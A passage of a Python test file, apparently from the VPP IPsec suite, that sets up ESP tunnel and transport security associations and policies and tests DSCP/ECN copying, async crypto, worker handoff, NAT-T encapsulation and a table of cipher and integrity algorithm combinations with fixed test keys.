        crypt_algo_vpp_id = params.crypt_algo_vpp_id
        crypt_key = params.crypt_key
        remote_tun_if_host = params.remote_tun_if_host
        addr_any = params.addr_any
        addr_bcast = params.addr_bcast
        e = VppEnum.vl_api_ipsec_spd_action_t
        flags = params.flags
        tun_flags = params.tun_flags
        salt = params.salt
        objs = []
        # Inbound and outbound tunnel SAs; the outbound SA swaps the
        # local/remote tunnel endpoints.
        params.tun_sa_in = VppIpsecSA(self, scapy_tun_sa_id, scapy_tun_spi,
                                      auth_algo_vpp_id, auth_key,
                                      crypt_algo_vpp_id, crypt_key,
                                      self.vpp_esp_protocol,
                                      self.tun_if.local_addr[addr_type],
                                      self.tun_if.remote_addr[addr_type],
                                      tun_flags=tun_flags,
                                      dscp=params.dscp,
                                      flags=flags,
                                      salt=salt,
                                      hop_limit=params.outer_hop_limit)
        params.tun_sa_out = VppIpsecSA(self, vpp_tun_sa_id, vpp_tun_spi,
                                       auth_algo_vpp_id, auth_key,
                                       crypt_algo_vpp_id, crypt_key,
                                       self.vpp_esp_protocol,
                                       self.tun_if.remote_addr[addr_type],
                                       self.tun_if.local_addr[addr_type],
                                       tun_flags=tun_flags,
                                       dscp=params.dscp,
                                       flags=flags,
                                       salt=salt,
                                       hop_limit=params.outer_hop_limit)
        objs.append(params.tun_sa_in)
        objs.append(params.tun_sa_out)
        # Any-to-any policies matching the ESP protocol itself,
        # one per direction.
        params.spd_policy_in_any = VppIpsecSpdEntry(self, self.tun_spd,
                                                    scapy_tun_sa_id,
                                                    addr_any, addr_bcast,
                                                    addr_any, addr_bcast,
                                                    socket.IPPROTO_ESP)
        params.spd_policy_out_any = VppIpsecSpdEntry(self, self.tun_spd,
                                                     scapy_tun_sa_id,
                                                     addr_any, addr_bcast,
                                                     addr_any, addr_bcast,
                                                     socket.IPPROTO_ESP,
                                                     is_outbound=0)
        objs.append(params.spd_policy_out_any)
        objs.append(params.spd_policy_in_any)
        # PROTECT policies between the remote tunnel host and pg1 (prio 10)
        # and pg0's local address (prio 20), in both directions.
        objs.append(VppIpsecSpdEntry(self, self.tun_spd, vpp_tun_sa_id,
                                     remote_tun_if_host, remote_tun_if_host,
                                     self.pg1.remote_addr[addr_type],
                                     self.pg1.remote_addr[addr_type],
                                     0,
                                     priority=10,
                                     policy=e.IPSEC_API_SPD_ACTION_PROTECT,
                                     is_outbound=0))
        objs.append(VppIpsecSpdEntry(self, self.tun_spd, scapy_tun_sa_id,
                                     self.pg1.remote_addr[addr_type],
                                     self.pg1.remote_addr[addr_type],
                                     remote_tun_if_host, remote_tun_if_host,
                                     0,
                                     policy=e.IPSEC_API_SPD_ACTION_PROTECT,
                                     priority=10))
        objs.append(VppIpsecSpdEntry(self, self.tun_spd, vpp_tun_sa_id,
                                     remote_tun_if_host, remote_tun_if_host,
                                     self.pg0.local_addr[addr_type],
                                     self.pg0.local_addr[addr_type],
                                     0,
                                     priority=20,
                                     policy=e.IPSEC_API_SPD_ACTION_PROTECT,
                                     is_outbound=0))
        objs.append(VppIpsecSpdEntry(self, self.tun_spd, scapy_tun_sa_id,
                                     self.pg0.local_addr[addr_type],
                                     self.pg0.local_addr[addr_type],
                                     remote_tun_if_host, remote_tun_if_host,
                                     0,
                                     policy=e.IPSEC_API_SPD_ACTION_PROTECT,
                                     priority=20))
        for o in objs:
            o.add_vpp_config()
        self.net_objs = self.net_objs + objs

    def config_esp_tra(self, params):
        """Configure transport-mode SAs and SPD policies for one param set."""
        addr_type = params.addr_type
        scapy_tra_sa_id = params.scapy_tra_sa_id
        scapy_tra_spi = params.scapy_tra_spi
        vpp_tra_sa_id = params.vpp_tra_sa_id
        vpp_tra_spi = params.vpp_tra_spi
        auth_algo_vpp_id = params.auth_algo_vpp_id
        auth_key = params.auth_key
        crypt_algo_vpp_id = params.crypt_algo_vpp_id
        crypt_key = params.crypt_key
        addr_any = params.addr_any
        addr_bcast = params.addr_bcast
        # Transport-mode SAs always get the anti-replay flag here.
        flags = (VppEnum.vl_api_ipsec_sad_flags_t.
                 IPSEC_API_SAD_FLAG_USE_ANTI_REPLAY)
        e = VppEnum.vl_api_ipsec_spd_action_t
        flags = params.flags | flags
        salt = params.salt
        objs = []
        params.tra_sa_in = VppIpsecSA(self, scapy_tra_sa_id, scapy_tra_spi,
                                      auth_algo_vpp_id, auth_key,
                                      crypt_algo_vpp_id, crypt_key,
                                      self.vpp_esp_protocol,
                                      flags=flags,
                                      salt=salt)
        params.tra_sa_out = VppIpsecSA(self, vpp_tra_sa_id, vpp_tra_spi,
                                       auth_algo_vpp_id, auth_key,
                                       crypt_algo_vpp_id, crypt_key,
                                       self.vpp_esp_protocol,
                                       flags=flags,
                                       salt=salt)
        objs.append(params.tra_sa_in)
        objs.append(params.tra_sa_out)
        # Any-to-any ESP-protocol policies (both directions), then PROTECT
        # policies for the transport interface's local/remote address pair.
        objs.append(VppIpsecSpdEntry(self, self.tra_spd, vpp_tra_sa_id,
                                     addr_any, addr_bcast,
                                     addr_any, addr_bcast,
                                     socket.IPPROTO_ESP))
        objs.append(VppIpsecSpdEntry(self, self.tra_spd, vpp_tra_sa_id,
                                     addr_any, addr_bcast,
                                     addr_any, addr_bcast,
                                     socket.IPPROTO_ESP,
                                     is_outbound=0))
        objs.append(VppIpsecSpdEntry(self, self.tra_spd, vpp_tra_sa_id,
                                     self.tra_if.local_addr[addr_type],
                                     self.tra_if.local_addr[addr_type],
                                     self.tra_if.remote_addr[addr_type],
                                     self.tra_if.remote_addr[addr_type],
                                     0, priority=10,
                                     policy=e.IPSEC_API_SPD_ACTION_PROTECT,
                                     is_outbound=0))
        objs.append(VppIpsecSpdEntry(self, self.tra_spd, scapy_tra_sa_id,
                                     self.tra_if.local_addr[addr_type],
                                     self.tra_if.local_addr[addr_type],
                                     self.tra_if.remote_addr[addr_type],
                                     self.tra_if.remote_addr[addr_type],
                                     0, policy=e.IPSEC_API_SPD_ACTION_PROTECT,
                                     priority=10))
        for o in objs:
            o.add_vpp_config()
        self.net_objs = self.net_objs + objs
class TemplateIpsecEsp(ConfigIpsecESP):
    """
    Basic test for ipsec esp sanity - tunnel and transport modes.
    Below 4 cases are covered as part of this test
    1) ipsec esp v4 transport basic test  - IPv4 Transport mode
       scenario using HMAC-SHA1-96 integrity algo
    2) ipsec esp v4 transport burst test
       Above test for 257 pkts
    3) ipsec esp 4o4 tunnel basic test    - IPv4 Tunnel mode
       scenario using HMAC-SHA1-96 integrity algo
    4) ipsec esp 4o4 tunnel burst test
       Above test for 257 pkts

    TRANSPORT MODE:

         ---   encrypt   ---
        |pg2| <-------> |VPP|
         ---   decrypt   ---

    TUNNEL MODE:

         ---   encrypt   ---   plain   ---
        |pg0| <-------  |VPP| <------ |pg1|
         ---             ---           ---

         ---   decrypt   ---   plain   ---
        |pg0| ------->  |VPP| ------> |pg1|
         ---             ---           ---
    """

    @classmethod
    def setUpClass(cls):
        super(TemplateIpsecEsp, cls).setUpClass()

    @classmethod
    def tearDownClass(cls):
        super(TemplateIpsecEsp, cls).tearDownClass()

    def setUp(self):
        super(TemplateIpsecEsp, self).setUp()
        # Build SPDs, SAs, policies and routes for every param set.
        self.config_network(self.params.values())

    def tearDown(self):
        # Undo the network config before the base class tears down.
        self.unconfig_network()
        super(TemplateIpsecEsp, self).tearDown()
class TestIpsecEsp1(TemplateIpsecEsp, IpsecTra46Tests,
                    IpsecTun46Tests, IpsecTra6ExtTests):
    """ Ipsec ESP - TUN & TRA tests """

    @classmethod
    def setUpClass(cls):
        super(TestIpsecEsp1, cls).setUpClass()

    @classmethod
    def tearDownClass(cls):
        super(TestIpsecEsp1, cls).tearDownClass()

    def setUp(self):
        super(TestIpsecEsp1, self).setUp()

    def tearDown(self):
        super(TestIpsecEsp1, self).tearDown()

    def test_tun_46(self):
        """ ipsec 4o6 tunnel """
        # add an SPD entry to direct 2.2.2.2 to the v6 tunnel SA
        p6 = self.ipv6_params
        p4 = self.ipv4_params
        p6.remote_tun_if_host4 = "2.2.2.2"
        e = VppEnum.vl_api_ipsec_spd_action_t
        VppIpsecSpdEntry(self,
                         self.tun_spd,
                         p6.scapy_tun_sa_id,
                         self.pg1.remote_addr[p4.addr_type],
                         self.pg1.remote_addr[p4.addr_type],
                         p6.remote_tun_if_host4,
                         p6.remote_tun_if_host4,
                         0,
                         priority=10,
                         policy=e.IPSEC_API_SPD_ACTION_PROTECT,
                         is_outbound=1).add_vpp_config()
        VppIpRoute(self, p6.remote_tun_if_host4, p4.addr_len,
                   [VppRoutePath(self.tun_if.remote_addr[p4.addr_type],
                                 0xffffffff)]).add_vpp_config()
        # v4 payload over a v6 tunnel: expect the esp4-encrypt node
        # while verifying, then restore the original node name.
        old_name = self.tun6_encrypt_node_name
        self.tun6_encrypt_node_name = "esp4-encrypt"
        self.verify_tun_46(p6, count=63)
        self.tun6_encrypt_node_name = old_name

    def test_tun_64(self):
        """ ipsec 6o4 tunnel """
        # add an SPD entry to direct 4444::4 to the v4 tunnel SA
        p6 = self.ipv6_params
        p4 = self.ipv4_params
        p4.remote_tun_if_host6 = "4444::4"
        e = VppEnum.vl_api_ipsec_spd_action_t
        VppIpsecSpdEntry(self,
                         self.tun_spd,
                         p4.scapy_tun_sa_id,
                         self.pg1.remote_addr[p6.addr_type],
                         self.pg1.remote_addr[p6.addr_type],
                         p4.remote_tun_if_host6,
                         p4.remote_tun_if_host6,
                         0,
                         priority=10,
                         policy=e.IPSEC_API_SPD_ACTION_PROTECT,
                         is_outbound=1).add_vpp_config()
        d = DpoProto.DPO_PROTO_IP6
        VppIpRoute(self, p4.remote_tun_if_host6, p6.addr_len,
                   [VppRoutePath(self.tun_if.remote_addr[p6.addr_type],
                                 0xffffffff,
                                 proto=d)]).add_vpp_config()
        # v6 payload over a v4 tunnel: expect the esp6-encrypt node
        # while verifying, then restore the original node name.
        old_name = self.tun4_encrypt_node_name
        self.tun4_encrypt_node_name = "esp6-encrypt"
        self.verify_tun_64(p4, count=63)
        self.tun4_encrypt_node_name = old_name
class TestIpsecEspTun(TemplateIpsecEsp, IpsecTun46Tests):
    """ Ipsec ESP - TUN encap tests """
    def setUp(self):
        # v4 SA copies only the DSCP into the outer header; the v6 SA
        # copies both DSCP and ECN.
        self.ipv4_params = IPsecIPv4Params()
        self.ipv6_params = IPsecIPv6Params()
        c = (VppEnum.vl_api_tunnel_encap_decap_flags_t.
             TUNNEL_API_ENCAP_DECAP_FLAG_ENCAP_COPY_DSCP)
        c1 = c | (VppEnum.vl_api_tunnel_encap_decap_flags_t.
                  TUNNEL_API_ENCAP_DECAP_FLAG_ENCAP_COPY_ECN)
        self.ipv4_params.tun_flags = c
        self.ipv6_params.tun_flags = c1
        super(TestIpsecEspTun, self).setUp()
    def gen_pkts(self, sw_intf, src, dst, count=1, payload_size=54):
        # set the DSCP + ECN (tos=5 is DSCP 1, ECN 1) - flags are set
        # to copy only DSCP
        return [Ether(src=sw_intf.remote_mac, dst=sw_intf.local_mac) /
                IP(src=src, dst=dst, tos=5) /
                UDP(sport=4444, dport=4444) /
                Raw(b'X' * payload_size)
                for i in range(count)]
    def gen_pkts6(self, p, sw_intf, src, dst, count=1, payload_size=54):
        # set the DSCP + ECN - flags are set to copy both
        return [Ether(src=sw_intf.remote_mac, dst=sw_intf.local_mac) /
                IPv6(src=src, dst=dst, tc=5) /
                UDP(sport=4444, dport=4444) /
                Raw(b'X' * payload_size)
                for i in range(count)]
    def verify_encrypted(self, p, sa, rxs):
        # just check that only the DSCP is copied: tos 4 is DSCP 1 with
        # the ECN bit cleared
        for rx in rxs:
            self.assertEqual(rx[IP].tos, 4)
    def verify_encrypted6(self, p, sa, rxs):
        # just check that the DSCP & ECN are copied unchanged
        for rx in rxs:
            self.assertEqual(rx[IPv6].tc, 5)
class TestIpsecEspTun2(TemplateIpsecEsp, IpsecTun46Tests):
    """ Ipsec ESP - TUN DSCP tests """
    def setUp(self):
        # a fixed DSCP value is configured per SA; the inner packets are
        # sent with tos/tc 0 and the outer header must carry the SA's DSCP
        self.ipv4_params = IPsecIPv4Params()
        self.ipv6_params = IPsecIPv6Params()
        self.ipv4_params.dscp = VppEnum.vl_api_ip_dscp_t.IP_API_DSCP_EF
        self.ipv6_params.dscp = VppEnum.vl_api_ip_dscp_t.IP_API_DSCP_AF11
        super(TestIpsecEspTun2, self).setUp()
    def gen_pkts(self, sw_intf, src, dst, count=1, payload_size=54):
        return [Ether(src=sw_intf.remote_mac, dst=sw_intf.local_mac) /
                IP(src=src, dst=dst) /
                UDP(sport=4444, dport=4444) /
                Raw(b'X' * payload_size)
                for i in range(count)]
    def gen_pkts6(self, p, sw_intf, src, dst, count=1, payload_size=54):
        return [Ether(src=sw_intf.remote_mac, dst=sw_intf.local_mac) /
                IPv6(src=src, dst=dst) /
                UDP(sport=4444, dport=4444) /
                Raw(b'X' * payload_size)
                for i in range(count)]
    def verify_encrypted(self, p, sa, rxs):
        # just check that only the DSCP is set (DSCP occupies the upper
        # six bits of the ToS byte, hence the shift)
        for rx in rxs:
            self.assertEqual(rx[IP].tos,
                             VppEnum.vl_api_ip_dscp_t.IP_API_DSCP_EF << 2)
    def verify_encrypted6(self, p, sa, rxs):
        # just check that the DSCP is set
        for rx in rxs:
            self.assertEqual(rx[IPv6].tc,
                             VppEnum.vl_api_ip_dscp_t.IP_API_DSCP_AF11 << 2)
class TestIpsecEsp2(TemplateIpsecEsp, IpsecTcpTests):
    """ Ipsec ESP - TCP tests """
    # all test behaviour comes from the IpsecTcpTests mixin
    pass
class TestIpsecEspAsync(TemplateIpsecEsp):
    """ Ipsec ESP - Async tests """
    # two workers so that the sync/async/noop SAs can exercise the
    # handoff between threads
    vpp_worker_count = 2

    def setUp(self):
        """Add two extra IPv4 tunnel SAs on top of the template's config:

        - self.p_sync: AES-CBC-256, taken on the synchronous crypto path
        - self.p_async: AES-GCM-256 with the ASYNC SAD flag set, taken on
          the asynchronous crypto path

        Each SA gets its own outbound SPD entry (matched on a dedicated
        destination host) plus a route so traffic to that host is
        protected by that SA.
        """
        super(TestIpsecEspAsync, self).setUp()

        self.p_sync = IPsecIPv4Params()
        self.p_sync.crypt_algo_vpp_id = (VppEnum.vl_api_ipsec_crypto_alg_t.
                                         IPSEC_API_CRYPTO_ALG_AES_CBC_256)
        self.p_sync.crypt_algo = 'AES-CBC'  # scapy name
        self.p_sync.crypt_key = b'JPjyOWBeVEQiMe7hJPjyOWBeVEQiMe7h'
        # offset IDs/SPIs so they cannot clash with the template's SAs
        self.p_sync.scapy_tun_sa_id += 0xf0000
        self.p_sync.scapy_tun_spi += 0xf0000
        self.p_sync.vpp_tun_sa_id += 0xf0000
        self.p_sync.vpp_tun_spi += 0xf0000
        self.p_sync.remote_tun_if_host = "2.2.2.2"
        e = VppEnum.vl_api_ipsec_spd_action_t

        self.p_sync.sa = VppIpsecSA(
            self,
            self.p_sync.vpp_tun_sa_id,
            self.p_sync.vpp_tun_spi,
            self.p_sync.auth_algo_vpp_id,
            self.p_sync.auth_key,
            self.p_sync.crypt_algo_vpp_id,
            self.p_sync.crypt_key,
            self.vpp_esp_protocol,
            self.tun_if.local_addr[self.p_sync.addr_type],
            self.tun_if.remote_addr[self.p_sync.addr_type]).add_vpp_config()
        self.p_sync.spd = VppIpsecSpdEntry(
            self,
            self.tun_spd,
            self.p_sync.vpp_tun_sa_id,
            self.pg1.remote_addr[self.p_sync.addr_type],
            self.pg1.remote_addr[self.p_sync.addr_type],
            self.p_sync.remote_tun_if_host,
            self.p_sync.remote_tun_if_host,
            0,
            priority=1,
            policy=e.IPSEC_API_SPD_ACTION_PROTECT,
            is_outbound=1).add_vpp_config()
        VppIpRoute(self,
                   self.p_sync.remote_tun_if_host,
                   self.p_sync.addr_len,
                   [VppRoutePath(
                       self.tun_if.remote_addr[self.p_sync.addr_type],
                       0xffffffff)]).add_vpp_config()
        config_tun_params(self.p_sync, self.encryption_type, self.tun_if)

        self.p_async = IPsecIPv4Params()
        self.p_async.crypt_algo_vpp_id = (VppEnum.vl_api_ipsec_crypto_alg_t.
                                          IPSEC_API_CRYPTO_ALG_AES_GCM_256)
        # GCM is an AEAD: no separate integrity algorithm
        self.p_async.auth_algo_vpp_id = (VppEnum.vl_api_ipsec_integ_alg_t.
                                         IPSEC_API_INTEG_ALG_NONE)
        self.p_async.crypt_algo = 'AES-GCM'  # scapy name
        self.p_async.crypt_key = b'JPjyOWBeVEQiMe7hJPjyOWBeVEQiMe7h'
        self.p_async.auth_algo = 'NULL'
        self.p_async.scapy_tun_sa_id += 0xe0000
        self.p_async.scapy_tun_spi += 0xe0000
        self.p_async.vpp_tun_sa_id += 0xe0000
        self.p_async.vpp_tun_spi += 0xe0000
        self.p_async.remote_tun_if_host = "2.2.2.3"

        iflags = VppEnum.vl_api_ipsec_sad_flags_t
        # the ASYNC flag is what routes this SA down the async crypto path
        self.p_async.flags = (iflags.IPSEC_API_SAD_FLAG_USE_ESN |
                              iflags.IPSEC_API_SAD_FLAG_USE_ANTI_REPLAY |
                              iflags.IPSEC_API_SAD_FLAG_ASYNC)

        self.p_async.sa = VppIpsecSA(
            self,
            self.p_async.vpp_tun_sa_id,
            self.p_async.vpp_tun_spi,
            self.p_async.auth_algo_vpp_id,
            self.p_async.auth_key,
            self.p_async.crypt_algo_vpp_id,
            self.p_async.crypt_key,
            self.vpp_esp_protocol,
            self.tun_if.local_addr[self.p_async.addr_type],
            self.tun_if.remote_addr[self.p_async.addr_type],
            flags=self.p_async.flags).add_vpp_config()
        self.p_async.spd = VppIpsecSpdEntry(
            self,
            self.tun_spd,
            self.p_async.vpp_tun_sa_id,
            self.pg1.remote_addr[self.p_async.addr_type],
            self.pg1.remote_addr[self.p_async.addr_type],
            self.p_async.remote_tun_if_host,
            self.p_async.remote_tun_if_host,
            0,
            priority=2,
            policy=e.IPSEC_API_SPD_ACTION_PROTECT,
            is_outbound=1).add_vpp_config()
        VppIpRoute(self,
                   self.p_async.remote_tun_if_host,
                   self.p_async.addr_len,
                   [VppRoutePath(
                       self.tun_if.remote_addr[self.p_async.addr_type],
                       0xffffffff)]).add_vpp_config()
        config_tun_params(self.p_async, self.encryption_type, self.tun_if)

    def test_dual_stream(self):
        """ Alternating SAs """
        p = self.params[self.p_sync.addr_type]
        self.vapi.ipsec_set_async_mode(async_enable=True)

        # interleave packets destined for the sync SA and the template SA
        pkts = [(Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
                 IP(src=self.pg1.remote_ip4,
                    dst=self.p_sync.remote_tun_if_host) /
                 UDP(sport=4444, dport=4444) /
                 Raw(b'0x0' * 200)),
                (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
                 IP(src=self.pg1.remote_ip4,
                    dst=p.remote_tun_if_host) /
                 UDP(sport=4444, dport=4444) /
                 Raw(b'0x0' * 200))]
        pkts *= 1023

        rxs = self.send_and_expect(self.pg1, pkts, self.pg0)
        self.assertEqual(len(rxs), len(pkts))

        for rx in rxs:
            # decrypt() raises if the packet is not valid for the SA, so
            # a successful call is the verification
            if rx[ESP].spi == p.scapy_tun_spi:
                p.vpp_tun_sa.decrypt(rx[IP])
            elif rx[ESP].spi == self.p_sync.vpp_tun_spi:
                self.p_sync.scapy_tun_sa.decrypt(rx[IP])
            else:
                rx.show()
                self.fail("unexpected ESP SPI: %d" % rx[ESP].spi)

        self.p_sync.spd.remove_vpp_config()
        self.p_sync.sa.remove_vpp_config()
        self.p_async.spd.remove_vpp_config()
        self.p_async.sa.remove_vpp_config()
        self.vapi.ipsec_set_async_mode(async_enable=False)

    def test_sync_async_noop_stream(self):
        """ Alternating SAs sync/async/noop """
        p = self.params[self.p_sync.addr_type]

        # first pin the default/noop SA to worker 0
        pkts = [(Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
                 IP(src=self.pg1.remote_ip4,
                    dst=p.remote_tun_if_host) /
                 UDP(sport=4444, dport=4444) /
                 Raw(b'0x0' * 200))]
        rxs = self.send_and_expect(self.pg1, pkts, self.pg0, worker=0)
        self.logger.info(self.vapi.cli("sh ipsec sa"))
        self.logger.info(self.vapi.cli("sh crypto async status"))

        # then use all the other SAs on worker 1.
        # some will handoff, other take the sync and async paths
        pkts = [(Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
                 IP(src=self.pg1.remote_ip4,
                    dst=self.p_sync.remote_tun_if_host) /
                 UDP(sport=4444, dport=4444) /
                 Raw(b'0x0' * 200)),
                (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
                 IP(src=self.pg1.remote_ip4,
                    dst=p.remote_tun_if_host) /
                 UDP(sport=4444, dport=4444) /
                 Raw(b'0x0' * 200)),
                (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
                 IP(src=self.pg1.remote_ip4,
                    dst=self.p_async.remote_tun_if_host) /
                 UDP(sport=4444, dport=4444) /
                 Raw(b'0x0' * 200))]
        pkts *= 1023

        rxs = self.send_and_expect(self.pg1, pkts, self.pg0, worker=1)
        self.assertEqual(len(rxs), len(pkts))

        for rx in rxs:
            # see test_dual_stream: decrypt() raising is the failure mode
            if rx[ESP].spi == p.scapy_tun_spi:
                p.vpp_tun_sa.decrypt(rx[IP])
            elif rx[ESP].spi == self.p_sync.vpp_tun_spi:
                self.p_sync.scapy_tun_sa.decrypt(rx[IP])
            elif rx[ESP].spi == self.p_async.vpp_tun_spi:
                self.p_async.scapy_tun_sa.decrypt(rx[IP])
            else:
                rx.show()
                self.fail("unexpected ESP SPI: %d" % rx[ESP].spi)

        self.p_sync.spd.remove_vpp_config()
        self.p_sync.sa.remove_vpp_config()
        self.p_async.spd.remove_vpp_config()
        self.p_async.sa.remove_vpp_config()

        # async mode should have been disabled now that there are
        # no async SAs. there's no API for this, so a reluctant
        # screen scrape.
        self.assertTrue("DISABLED" in self.vapi.cli("sh crypto async status"))
class TestIpsecEspHandoff(TemplateIpsecEsp,
                          IpsecTun6HandoffTests,
                          IpsecTun4HandoffTests):
    """ Ipsec ESP - handoff tests """
    # all test behaviour comes from the handoff mixins
    pass
class TemplateIpsecEspUdp(ConfigIpsecESP):
    """
    UDP encapped ESP
    """
    @classmethod
    def setUpClass(cls):
        super(TemplateIpsecEspUdp, cls).setUpClass()
    @classmethod
    def tearDownClass(cls):
        super(TemplateIpsecEspUdp, cls).tearDownClass()
    def setUp(self):
        super(TemplateIpsecEspUdp, self).setUp()
        self.net_objs = []
        self.tun_if = self.pg0
        self.tra_if = self.pg2
        self.logger.info(self.vapi.ppcli("show int addr"))
        p = self.ipv4_params
        # NAT-T: the ESP packets are wrapped in UDP (dport 4500)
        p.flags = (VppEnum.vl_api_ipsec_sad_flags_t.
                   IPSEC_API_SAD_FLAG_UDP_ENCAP)
        # header scapy uses to build/expect the UDP encapsulation
        p.nat_header = UDP(sport=5454, dport=4500)
        # transport-mode SPD bound to the transport interface
        self.tra_spd = VppIpsecSpd(self, self.tra_spd_id)
        self.tra_spd.add_vpp_config()
        VppIpsecSpdItfBinding(self, self.tra_spd,
                              self.tra_if).add_vpp_config()
        self.config_esp_tra(p)
        config_tra_params(p, self.encryption_type)
        # tunnel-mode SPD bound to the tunnel interface
        self.tun_spd = VppIpsecSpd(self, self.tun_spd_id)
        self.tun_spd.add_vpp_config()
        VppIpsecSpdItfBinding(self, self.tun_spd,
                              self.tun_if).add_vpp_config()
        self.config_esp_tun(p)
        self.logger.info(self.vapi.ppcli("show ipsec all"))
        # route the remote tunnel host via the tunnel interface's peer
        d = DpoProto.DPO_PROTO_IP4
        VppIpRoute(self, p.remote_tun_if_host, p.addr_len,
                   [VppRoutePath(self.tun_if.remote_addr[p.addr_type],
                                 0xffffffff,
                                 proto=d)]).add_vpp_config()
    def tearDown(self):
        super(TemplateIpsecEspUdp, self).tearDown()
    def show_commands_at_teardown(self):
        self.logger.info(self.vapi.cli("show hardware"))
class TestIpsecEspUdp(TemplateIpsecEspUdp, IpsecTra4Tests):
    """ Ipsec NAT-T ESP UDP tests """
    # all test behaviour comes from the IpsecTra4Tests mixin
    pass
class MyParameters():
    # Table of the crypto/integrity algorithm combinations exercised by
    # RunTestIpsecEspAll.  Each entry maps a "CRYPTO/INTEG" name to the
    # VPP API enum values, the corresponding scapy algorithm names, the
    # (test-only) key material and the salt used for CTR/GCM modes.
    def __init__(self):
        # flags[0] = no extended sequence numbers, flags[1] = use ESN
        flag_esn = VppEnum.vl_api_ipsec_sad_flags_t.IPSEC_API_SAD_FLAG_USE_ESN
        self.flags = [0, flag_esn]
        # foreach crypto algorithm
        self.algos = {
            'AES-GCM-128/NONE': {
                  'vpp-crypto': (VppEnum.vl_api_ipsec_crypto_alg_t.
                                 IPSEC_API_CRYPTO_ALG_AES_GCM_128),
                  'vpp-integ': (VppEnum.vl_api_ipsec_integ_alg_t.
                                IPSEC_API_INTEG_ALG_NONE),
                  'scapy-crypto': "AES-GCM",
                  'scapy-integ': "NULL",
                  'key': b"JPjyOWBeVEQiMe7h",
                  'salt': 0},
            'AES-GCM-192/NONE': {
                  'vpp-crypto': (VppEnum.vl_api_ipsec_crypto_alg_t.
                                 IPSEC_API_CRYPTO_ALG_AES_GCM_192),
                  'vpp-integ': (VppEnum.vl_api_ipsec_integ_alg_t.
                                IPSEC_API_INTEG_ALG_NONE),
                  'scapy-crypto': "AES-GCM",
                  'scapy-integ': "NULL",
                  'key': b"JPjyOWBeVEQiMe7h01234567",
                  'salt': 1010},
            'AES-GCM-256/NONE': {
                  'vpp-crypto': (VppEnum.vl_api_ipsec_crypto_alg_t.
                                 IPSEC_API_CRYPTO_ALG_AES_GCM_256),
                  'vpp-integ': (VppEnum.vl_api_ipsec_integ_alg_t.
                                IPSEC_API_INTEG_ALG_NONE),
                  'scapy-crypto': "AES-GCM",
                  'scapy-integ': "NULL",
                  'key': b"JPjyOWBeVEQiMe7h0123456787654321",
                  'salt': 2020},
            'AES-CBC-128/MD5-96': {
                  'vpp-crypto': (VppEnum.vl_api_ipsec_crypto_alg_t.
                                 IPSEC_API_CRYPTO_ALG_AES_CBC_128),
                  'vpp-integ': (VppEnum.vl_api_ipsec_integ_alg_t.
                                IPSEC_API_INTEG_ALG_MD5_96),
                  'scapy-crypto': "AES-CBC",
                  'scapy-integ': "HMAC-MD5-96",
                  'salt': 0,
                  'key': b"JPjyOWBeVEQiMe7h"},
            'AES-CBC-192/SHA1-96': {
                  'vpp-crypto': (VppEnum.vl_api_ipsec_crypto_alg_t.
                                 IPSEC_API_CRYPTO_ALG_AES_CBC_192),
                  'vpp-integ': (VppEnum.vl_api_ipsec_integ_alg_t.
                                IPSEC_API_INTEG_ALG_SHA1_96),
                  'scapy-crypto': "AES-CBC",
                  'scapy-integ': "HMAC-SHA1-96",
                  'salt': 0,
                  'key': b"JPjyOWBeVEQiMe7hJPjyOWBe"},
            'AES-CBC-256/SHA1-96': {
                  'vpp-crypto': (VppEnum.vl_api_ipsec_crypto_alg_t.
                                 IPSEC_API_CRYPTO_ALG_AES_CBC_256),
                  'vpp-integ': (VppEnum.vl_api_ipsec_integ_alg_t.
                                IPSEC_API_INTEG_ALG_SHA1_96),
                  'scapy-crypto': "AES-CBC",
                  'scapy-integ': "HMAC-SHA1-96",
                  'salt': 0,
                  'key': b"JPjyOWBeVEQiMe7hJPjyOWBeVEQiMe7h"},
            '3DES-CBC/SHA1-96': {
                  'vpp-crypto': (VppEnum.vl_api_ipsec_crypto_alg_t.
                                 IPSEC_API_CRYPTO_ALG_3DES_CBC),
                  'vpp-integ': (VppEnum.vl_api_ipsec_integ_alg_t.
                                IPSEC_API_INTEG_ALG_SHA1_96),
                  'scapy-crypto': "3DES",
                  'scapy-integ': "HMAC-SHA1-96",
                  'salt': 0,
                  'key': b"JPjyOWBeVEQiMe7h00112233"},
            'NONE/SHA1-96': {
                  'vpp-crypto': (VppEnum.vl_api_ipsec_crypto_alg_t.
                                 IPSEC_API_CRYPTO_ALG_NONE),
                  'vpp-integ': (VppEnum.vl_api_ipsec_integ_alg_t.
                                IPSEC_API_INTEG_ALG_SHA1_96),
                  'scapy-crypto': "NULL",
                  'scapy-integ': "HMAC-SHA1-96",
                  'salt': 0,
                  'key': b"JPjyOWBeVEQiMe7h00112233"},
            'AES-CTR-128/SHA1-96': {
                  'vpp-crypto': (VppEnum.vl_api_ipsec_crypto_alg_t.
                                 IPSEC_API_CRYPTO_ALG_AES_CTR_128),
                  'vpp-integ': (VppEnum.vl_api_ipsec_integ_alg_t.
                                IPSEC_API_INTEG_ALG_SHA1_96),
                  'scapy-crypto': "AES-CTR",
                  'scapy-integ': "HMAC-SHA1-96",
                  'salt': 0,
                  'key': b"JPjyOWBeVEQiMe7h"},
            'AES-CTR-192/SHA1-96': {
                  'vpp-crypto': (VppEnum.vl_api_ipsec_crypto_alg_t.
                                 IPSEC_API_CRYPTO_ALG_AES_CTR_192),
                  'vpp-integ': (VppEnum.vl_api_ipsec_integ_alg_t.
                                IPSEC_API_INTEG_ALG_SHA1_96),
                  'scapy-crypto': "AES-CTR",
                  'scapy-integ': "HMAC-SHA1-96",
                  'salt': 1010,
                  'key': b"JPjyOWBeVEQiMe7hJPjyOWBe"},
            'AES-CTR-256/SHA1-96': {
                  'vpp-crypto': (VppEnum.vl_api_ipsec_crypto_alg_t.
                                 IPSEC_API_CRYPTO_ALG_AES_CTR_256),
                  'vpp-integ': (VppEnum.vl_api_ipsec_integ_alg_t.
                                IPSEC_API_INTEG_ALG_SHA1_96),
                  'scapy-crypto': "AES-CTR",
                  'scapy-integ': "HMAC-SHA1-96",
                  'salt': 2020,
                  'key': b"JPjyOWBeVEQiMe7hJPjyOWBeVEQiMe7h"}}
class RunTestIpsecEspAll(ConfigIpsecESP,
                         IpsecTra4, IpsecTra6,
